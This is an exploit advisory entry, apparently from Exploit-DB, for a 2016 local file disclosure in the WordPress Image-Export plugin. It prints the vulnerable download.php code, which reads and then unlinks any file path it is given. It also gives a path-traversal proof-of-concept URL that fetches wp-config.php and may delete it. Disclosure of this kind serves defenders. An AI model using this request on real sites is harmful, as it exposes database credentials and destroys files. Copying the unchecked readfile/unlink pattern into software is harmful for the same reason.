Wordpress image-export LFD

vendor:

Image-Export

by:

AMAR^SHG

7,5

CVSS

HIGH

Local File Disclosure

200

CWE

Product Name: Image-Export

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: Yes

Related CWE: N/A

CPE: a:1efthander:image-export

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows/Unix

2016

The download.php file in the Wordpress image-export plugin is vulnerable to a Local File Disclosure vulnerability. An attacker can use the 'file' GET parameter to access any file on the server, including the Wordpress core. This can be exploited by sending a request to the download.php file with the 'file' parameter set to the path of the file to be accessed, such as '../../../wp-config.php'.

Mitigation:

Update to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost

download.php file code:

<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
	$file = $_GET['file'];

	header( 'Content-Type: application/zip' );
	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
	readfile( $file );
	unlink( $file );
	
	exit;
}
?>

Proof of concept:

Note that because of the unlink, we potentially can destroy the wordpress core.

Simply add the get parameter file:

localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php

Found by AMAR^SHG (Shkupi Hackers Group)